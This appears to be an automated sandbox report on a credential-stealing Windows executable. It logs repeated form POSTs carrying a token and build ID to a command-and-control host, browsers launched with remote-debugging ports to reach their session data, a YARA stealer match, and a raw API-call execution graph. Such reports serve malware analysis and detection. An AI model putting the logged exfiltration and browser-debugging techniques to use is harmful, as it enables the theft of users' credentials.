                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:59:09 UTC | 1841 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------58GVKXT2VAAIEUSR1VAAContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------58GVKXT2VAAIEUSR1VAAContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------58GVKXT2VAAIEUSR1VAACont
2024-12-23 05:59:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:59:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.5 | 50129 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:10 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----4WTRQQIMOZUAIEK6PPHL
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:59:10 UTC | 1829 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------4WTRQQIMOZUAIEK6PPHLContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------4WTRQQIMOZUAIEK6PPHLContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------4WTRQQIMOZUAIEK6PPHLCont
2024-12-23 05:59:11 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:10 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:59:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.5 | 50135 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:12 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ZCJ5X4E3W4EUAIEKXL6F
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:59:12 UTC | 1825 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------ZCJ5X4E3W4EUAIEKXL6FContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------ZCJ5X4E3W4EUAIEKXL6FContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------ZCJ5X4E3W4EUAIEKXL6FCont
2024-12-23 05:59:13 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:59:13 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.5 | 50136 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:13 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HD2DTJM7GVAIEUKNOHVA
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:59:13 UTC | 1841 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------HD2DTJM7GVAIEUKNOHVAContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------HD2DTJM7GVAIEUKNOHVAContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------HD2DTJM7GVAIEUKNOHVACont
2024-12-23 05:59:14 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:13 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:59:14 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.5 | 50142 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:15 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----Q90R90ZMOZUAIMGDJMOZ
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:15 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------Q90R90ZMOZUAIMGDJMOZContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------Q90R90ZMOZUAIMGDJMOZContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------Q90R90ZMOZUAIMGDJMOZCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:15 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.5 | 50145 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:16 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----58YU37G4OZU37YUAS2NY
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:59:16 UTC | 1841 | OUT | Data Ascii: ------58YU37G4OZU37YUAS2NYContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------58YU37G4OZU37YUAS2NYContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------58YU37G4OZU37YUAS2NYCont
2024-12-23 05:59:17 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:59:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:59:17 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.5 | 50151 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:18 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCB1VK689RQIEUAIMOPZ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1841
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:59:18 UTC | 1841 | OUT | Data Ascii: ------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------FCB1VK689RQIEUAIMOPZCont
2024-12-23 05:59:19 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:59:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:59:19 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.5 | 50155 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:59:19 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KN7Y5FUK6F37YU3OPHVS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 1829
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:59:19 UTC | 1829 | OUT | Data Ascii: ------KN7Y5FUK6F37YU3OPHVSContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------KN7Y5FUK6F37YU3OPHVSContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------KN7Y5FUK6F37YU3OPHVSCont
2024-12-23 05:59:20 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:59:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:59:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Target ID: 0
Start time: 00:57:14
Start date: 23/12/2024
Path: C:\Users\user\Desktop\gVKsiQIHqe.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\gVKsiQIHqe.exe"
Imagebase: 0x400000
File size: 147'968 bytes
MD5 hash: 2E45D5934DB7DA8FF7B560A80CEB96AB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

Target ID:2
Start time:00:57:31
Start date:23/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:00:57:32
Start date:23/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 --field-trial-handle=2812,i,12872953387069903488,11110384550952122137,262144 /prefetch:8
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:00:57:46
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:00:57:46
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2224,i,4927073609183200829,12100842426449448139,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:00:57:46
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:9
Start time:00:57:47
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:14
Start time:00:57:51
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:00:57:51
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6444 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:19
Start time:00:58:47
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6504 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Execution Graph

Execution Coverage:28.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:7.7%
Total number of Nodes:2000
Total number of Limit Nodes:26
StrCmpCA 13297->13302 13303 41342f StrCmpCA 13297->13303 13298->12564 13299->13297 13300->13295 13300->13297 13301->13297 13302->13297 13303->13295 13303->13297 13304->13294 13305->13294 13306->13294 13307->13294 13308->13294 13309->13294 13310->13294 13311->13294 13312->13294 13883 410530 13313->13883 13315 412aa9 strtok_s 13316 412c24 13315->13316 13323 412ac4 13315->13323 13316->12578 13317 412b00 strtok_s 13317->13316 13317->13323 13318 412bc3 StrCmpCA 13318->13323 13319 412acb StrCmpCA 13319->13317 13320 412b92 StrCmpCA 13320->13323 13321 412b3f StrCmpCA 13321->13323 13322 410240 lstrlenA lstrcpyA 13322->13323 13323->13317 13323->13318 13323->13319 13323->13320 13323->13321 13323->13322 13325 412d8b 13323->13325 13330 412e3e 13323->13330 13324 410240 lstrlenA lstrcpyA 13324->13325 13325->13324 13326 412db0 strtok_s 13325->13326 13328 412e8b StrCmpCA 13325->13328 13325->13330 13353 412fca 13325->13353 13326->13325 13326->13330 13327 412ec0 strtok_s 13329 412f4d 13327->13329 13327->13330 13328->13327 13329->12578 13330->12578 13330->13327 13330->13328 13331 413262 StrCmpCA 13330->13331 13334 410240 lstrlenA lstrcpyA 13330->13334 13330->13353 13333 413277 StrCmpCA 13331->13333 13331->13353 13332 410240 lstrlenA lstrcpyA 13332->13353 13333->13353 13334->13330 13335 413010 strtok_s 13345 4132d3 13335->13345 13335->13353 13336 41307f lstrcpyA 13337 411550 2 API calls 13336->13337 13337->13353 13338 4133a0 StrCmpCA 13343 413360 strtok_s 13338->13343 13338->13345 13339 413384 StrCmpCA 13339->13343 13339->13345 13340 4133d8 StrCmpCA 13340->13343 13340->13345 13341 4133bc StrCmpCA 13341->13343 13341->13345 13342 41340c StrCmpCA 13342->13343 13342->13345 13343->13345 13346 4134f6 13343->13346 13344 410240 2 API calls 13344->13345 13345->12578 13345->13338 13345->13339 13345->13340 13345->13341 13345->13342 13345->13343 13345->13344 13347 4134b3 StrCmpCA 13345->13347 13348 413452 StrCmpCA 13345->13348 13349 413475 StrCmpCA 13345->13349 13350 413494 StrCmpCA 13345->13350 
13351 41342f StrCmpCA 13345->13351 13346->12578 13347->13345 13348->13343 13348->13345 13349->13345 13350->13345 13351->13343 13351->13345 13352 4130ac lstrcpyA 13352->13353 13353->13331 13353->13332 13353->13335 13353->13336 13353->13338 13353->13339 13353->13340 13353->13341 13353->13342 13353->13345 13353->13352 13354 4130d8 lstrcpyA 13353->13354 13355 413104 lstrcpyA 13353->13355 13356 411550 lstrcpyA SHGetFolderPathA 13353->13356 13357 413130 lstrcpyA 13353->13357 13358 41315c lstrcpyA 13353->13358 13359 413188 lstrcpyA 13353->13359 13360 4131b4 lstrcpyA 13353->13360 13361 4131e0 lstrcpyA 13353->13361 13354->13353 13355->13353 13356->13353 13357->13353 13358->13353 13359->13353 13360->13353 13361->13353 13884 410530 13362->13884 13364 412c59 strtok_s 13365 412d34 13364->13365 13367 412c74 13364->13367 13365->12592 13366 412cf0 StrCmpCA 13366->13367 13367->13366 13368 410240 lstrlenA lstrcpyA 13367->13368 13369 412ca5 strtok_s 13367->13369 13368->13367 13369->13365 13369->13367 13371 4101c0 lstrcpyA 13370->13371 13372 413528 13371->13372 13373 410340 3 API calls 13372->13373 13374 413538 13373->13374 13375 410290 lstrcpyA 13374->13375 13376 413540 13375->13376 13377 410340 3 API calls 13376->13377 13378 413555 13377->13378 13379 410290 lstrcpyA 13378->13379 13380 41355d 13379->13380 13381 410340 3 API calls 13380->13381 13382 413571 13381->13382 13383 410290 lstrcpyA 13382->13383 13384 413579 13383->13384 13385 410340 3 API calls 13384->13385 13386 41358d 13385->13386 13387 410290 lstrcpyA 13386->13387 13388 413595 13387->13388 13389 410340 3 API calls 13388->13389 13390 4135a9 13389->13390 13391 410290 lstrcpyA 13390->13391 13392 4135b1 13391->13392 13885 410920 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13392->13885 13394 4135bd 13395 410340 3 API calls 13394->13395 13396 4135c6 13395->13396 13397 410290 lstrcpyA 13396->13397 13398 4135ce 13397->13398 13399 410340 3 API calls 13398->13399 13400 4135e2 13399->13400 13401 410290 lstrcpyA 13400->13401 13402 
4135ea 13401->13402 13403 410340 3 API calls 13402->13403 13404 4135fe 13403->13404 13405 410290 lstrcpyA 13404->13405 13406 413606 13405->13406 13886 411120 RegOpenKeyExA 13406->13886 13408 413612 13409 410340 3 API calls 13408->13409 13410 41361b 13409->13410 13411 410290 lstrcpyA 13410->13411 13412 413623 13411->13412 13413 410340 3 API calls 13412->13413 13414 413637 13413->13414 13415 410290 lstrcpyA 13414->13415 13416 41363f 13415->13416 13417 410340 3 API calls 13416->13417 13418 413653 13417->13418 13419 410290 lstrcpyA 13418->13419 13420 41365b 13419->13420 13421 410700 7 API calls 13420->13421 13422 41366b 13421->13422 13423 4102e0 2 API calls 13422->13423 13424 413674 13423->13424 13425 410290 lstrcpyA 13424->13425 13426 41367c 13425->13426 13427 410340 3 API calls 13426->13427 13428 413697 13427->13428 13429 410290 lstrcpyA 13428->13429 13430 41369f 13429->13430 13431 410340 3 API calls 13430->13431 13432 4136b3 13431->13432 13433 410290 lstrcpyA 13432->13433 13434 4136bb 13433->13434 13435 410540 14 API calls 13434->13435 13436 4136c8 13435->13436 13437 4102e0 2 API calls 13436->13437 13438 4136d1 13437->13438 13439 410290 lstrcpyA 13438->13439 13440 4136d9 13439->13440 13441 410340 3 API calls 13440->13441 13442 4136f4 13441->13442 13443 410290 lstrcpyA 13442->13443 13444 4136fc 13443->13444 13445 410340 3 API calls 13444->13445 13446 413710 13445->13446 13447 410290 lstrcpyA 13446->13447 13448 413718 13447->13448 13449 41371f GetCurrentProcessId 13448->13449 13889 411cc0 OpenProcess 13449->13889 13452 4102e0 2 API calls 13453 413735 13452->13453 13454 410290 lstrcpyA 13453->13454 13455 41373d 13454->13455 13456 410340 3 API calls 13455->13456 13457 413758 13456->13457 13458 410290 lstrcpyA 13457->13458 13459 413760 13458->13459 13460 410340 3 API calls 13459->13460 13461 413774 13460->13461 13462 410290 lstrcpyA 13461->13462 13463 41377c 13462->13463 13464 410340 3 API calls 13463->13464 13465 413790 13464->13465 13466 410290 lstrcpyA 13465->13466 
13467 413798 13466->13467 13468 410340 3 API calls 13467->13468 13469 4137ac 13468->13469 13470 410290 lstrcpyA 13469->13470 13471 4137b4 13470->13471 13894 4107c0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegOpenKeyExA 13471->13894 13474 410340 3 API calls 13475 4137c9 13474->13475 13476 410290 lstrcpyA 13475->13476 13477 4137d1 13476->13477 13478 410340 3 API calls 13477->13478 13479 4137e5 13478->13479 13480 410290 lstrcpyA 13479->13480 13481 4137ed 13480->13481 13482 410340 3 API calls 13481->13482 13483 413801 13482->13483 13484 410290 lstrcpyA 13483->13484 13485 413809 13484->13485 13902 411200 13485->13902 13488 4102e0 2 API calls 13489 41381f 13488->13489 13490 410290 lstrcpyA 13489->13490 13491 413827 13490->13491 13492 410340 3 API calls 13491->13492 13493 413842 13492->13493 13494 410290 lstrcpyA 13493->13494 13495 41384a 13494->13495 13496 410340 3 API calls 13495->13496 13497 41385e 13496->13497 13498 410290 lstrcpyA 13497->13498 13499 413866 13498->13499 13500 411200 lstrcpyA 13499->13500 13501 413873 13500->13501 13502 4102e0 2 API calls 13501->13502 13503 41387c 13502->13503 13504 410290 lstrcpyA 13503->13504 13505 413884 13504->13505 13506 410340 3 API calls 13505->13506 13507 41389f 13506->13507 13508 410290 lstrcpyA 13507->13508 13509 4138a7 13508->13509 13510 410340 3 API calls 13509->13510 13511 4138bb 13510->13511 13512 410290 lstrcpyA 13511->13512 13513 4138c3 13512->13513 13905 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 13513->13905 13515 4138cf 13516 410340 3 API calls 13515->13516 13517 4138d8 13516->13517 13518 410290 lstrcpyA 13517->13518 13519 4138e0 13518->13519 13520 410340 3 API calls 13519->13520 13521 4138f4 13520->13521 13522 410290 lstrcpyA 13521->13522 13523 4138fc 13522->13523 13524 410340 3 API calls 13523->13524 13525 413910 13524->13525 13526 410290 lstrcpyA 13525->13526 13527 413918 13526->13527 13906 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13527->13906 13529 413924 13530 410340 3 API calls 13529->13530 
